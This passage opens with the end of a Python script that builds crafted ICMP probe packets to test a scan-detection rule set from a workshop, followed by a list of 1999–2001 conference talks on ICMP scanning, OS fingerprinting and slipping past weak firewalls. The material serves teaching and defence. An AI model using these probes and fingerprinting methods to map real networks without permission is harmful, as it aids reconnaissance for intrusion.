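# Constructed traffic sample: one benign ping, five probes, one UDP datagram.
SAMPLE = [
    build_ipv4(build_icmp(8, 0, data=b"hello")),                # 0: plain ping
    build_ipv4(build_icmp(8, 123, data=b"x")),                  # 1: non-zero code
    build_ipv4(build_icmp(8, 0), tos=0x10, df=True),            # 2: TOS + DF set
    build_ipv4(build_icmp(13, 0, data=b"\0" * 12)),             # 3: timestamp req
    build_ipv4(build_icmp(17, 0)),                              # 4: address mask
    build_ipv4(build_icmp(8, 0), ihl=3),                        # 5: IHL too small
    build_ipv4(b"\x12\x34\x00\x35\x00\x08\x00\x00", proto=17),  # 6: UDP, ignored
]

if __name__ == "__main__":
    for index, alerts in run(SAMPLE).items():
        for alert in alerts:
            print("packet %d: %s" % (index, alert))
```

Each branch of `inspect_packet` is one rule: a type (and code) match for the rarely used queries, a code-field match for echo requests, IP header field matches for the TOS and DF variants, and the IHL check for the malformed-header case. Expect false positives from DF-set pings and from monitoring agents that use timestamp requests; sorting those out is the “differentiate between legitimate and non-legitimate traffic” part of the workshop, and it is why such rules are usually paired with thresholds rather than fired on a single packet.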

Defcon 9
July 13-15, 2001.
Alexis Park Hotel and Resort, Las Vegas, USA.

Topic: Introducing X: Playing Tricks with ICMP

During my research on the “ICMP Usage In Scanning” project, I discovered some new active and passive operating system fingerprinting methods using the ICMP protocol: methods that are simple and efficient.

The active operating system fingerprinting methods had not been correlated into a single logic, one that would allow us to use any available method in order to fingerprint an operating system actively and wisely.

In this talk I will be releasing a new active operating system fingerprinting tool using the active OS fingerprinting methods with the ICMP protocol I have discovered.

I will be explaining the tool’s inner workings and the various active OS fingerprinting methods with ICMP implemented and used by the tool.

The tool’s limitations, ways to detect its usage, and how to defend ourselves from its abilities will also be discussed.

Future plans and enhancements, which include a different approach to OS detection, will be presented as well.

The Black Hat Briefings 2001
July 11-12, 2001.
Caesars Palace, Las Vegas, USA.

Topic: Introducing X: Playing Tricks with ICMP

During my research on the “ICMP Usage In Scanning” project, I discovered some new active and passive operating system fingerprinting methods using the ICMP protocol: methods that are simple and efficient.

The active operating system fingerprinting methods had not been correlated into a single logic, one that would allow us to use any available method in order to fingerprint an operating system actively and wisely.

In this talk I will be releasing a new active operating system fingerprinting tool using the active OS fingerprinting methods with the ICMP protocol I have discovered.

I will be explaining the tool’s inner workings and the various active OS fingerprinting methods with ICMP implemented and used by the tool.

The tool’s limitations, ways to detect its usage, and how to defend ourselves from its abilities will also be discussed.

Future plans and enhancements, which include a different approach to OS detection, will be presented as well.

The Black Hat Briefings 2001 – Training
July 9-10, 2001.
Caesars Palace, Las Vegas, USA.

Topic: Advanced Scanning Techniques with ICMP

The Black Hat Briefings 2001
April 26-27, 2001.
Grand Copthorne Waterfront, Singapore.

Topic: ICMP Usage In Scanning (The Advanced Methods)

The ICMP protocol may seem harmless at first glance. Its goals and features were outlined in RFC 792 (and later clarified in RFCs 1122, 1256, 1349 and 1812) as a means to send error messages.

In terms of security, ICMP is one of the most controversial protocols in the TCP/IP protocol suite. The risks involved in implementing the ICMP protocol in a network are the subject of this lecture…

The Black Hat Briefings 2001 – Training
April 25, 2001.
Grand Copthorne Waterfront, Singapore.

Session Training: Advanced Scanning with ICMP

All you wanted to know about the usage of ICMP in Scanning. This workshop will be an in-depth theoretical and hands-on experience dealing with the ICMP protocol usage in Scanning. Starting with the simplest methods of Host Detection to Operating System Active and Passive fingerprinting…

The Black Hat Briefings 2001
April 23-24, 2001.
Sheraton, Hong Kong.

Topic: ICMP Usage In Scanning (The Advanced Methods)

The ICMP protocol may seem harmless at first glance. Its goals and features were outlined in RFC 792 (and later clarified in RFCs 1122, 1256, 1349 and 1812) as a means to send error messages. In terms of security, ICMP is one of the most controversial protocols in the TCP/IP protocol suite. The risks involved in implementing the ICMP protocol in a network are the subject of this lecture…

The Black Hat Windows 2k Security Conference
February 14-15, 2001.
Caesars Palace, Las Vegas, USA.

Topic: Active & Passive Fingerprinting of Microsoft Based Operating Systems using the ICMP protocol

The ICMP protocol may seem harmless at first glance. Its goals and features were outlined in RFC 792 (and later clarified in RFCs 1122, 1256, 1349 and 1812) as a means to send error messages. In terms of security, ICMP is one of the most controversial protocols in the TCP/IP protocol suite. The risks involved in implementing the ICMP protocol in a network, and the ways of using the ICMP protocol to fingerprint Microsoft based operating systems, are the subject of this lecture…

The Black Hat Windows 2k Security Conference – Training
February 12-13, 2001.
Caesars Palace, Las Vegas, USA.

Session Training: Advanced Scanning with ICMP

All you wanted to know about the usage of ICMP in Scanning. This workshop will be an in-depth theoretical and hands-on experience dealing with the ICMP protocol usage in Scanning. Starting with the simplest methods of Host Detection to Operating System Active and Passive fingerprinting…

The Second Annual Israeli Security Conference
November 20, 2000.
Dan Panorama Hotel, Tel-Aviv, Israel.

Topic: Identifying ICMP Hackery Tools

The Black Hat Briefings 2000 Amsterdam
October 23-25, 2000.
Radisson Hotel, Amsterdam.

The ICMP protocol may seem harmless at first glance. Its goals and features were outlined in RFC 792 (and later clarified in RFCs 1122, 1256 and 1812) as a means to send error messages.

In terms of security, ICMP is one of the most controversial protocols in the TCP/IP protocol suite. The risks involved in implementing the ICMP protocol in a network are the subject of this lecture.

The first topic to be presented will be host detection using the various ICMP query message types, with some elementary examples.

Next we will overview some advanced host detection methods, mainly centered on eliciting an ICMP error message back from the probed machines. Methods that allow us to map entire networks and to understand the ACL filtering devices protecting them will be used during the course of the lecture. Some of these methods also allow us to bypass weak firewalls.

Recent methods of operating system fingerprinting discovered by the ICMP project (www.sys-security.com) will also be presented. Some of these methods allow a malicious computer attacker to identify Microsoft Windows 2000 machines and to isolate certain groups of operating systems.

New methods currently being researched by Ofir Arkin, dealing with passive fingerprinting with the ICMP protocol, will be discussed as well. At the end of the talk a few minutes will be spent on some considerations necessary for firewall policy design.

The First Israeli Hackers Conference
28-30 March, 2000.
Ganey Hata’rocha, Tel-Aviv, Israel.

Topic: Network Scanning Techniques
http://www.y2hack.com

The First Annual Israeli Security Conference
8-10 November, 1999.
Dan Panorama Hotel, Tel-Aviv, Israel.

Topic: Two-day seminar on Intrusion Techniques & Countermeasures
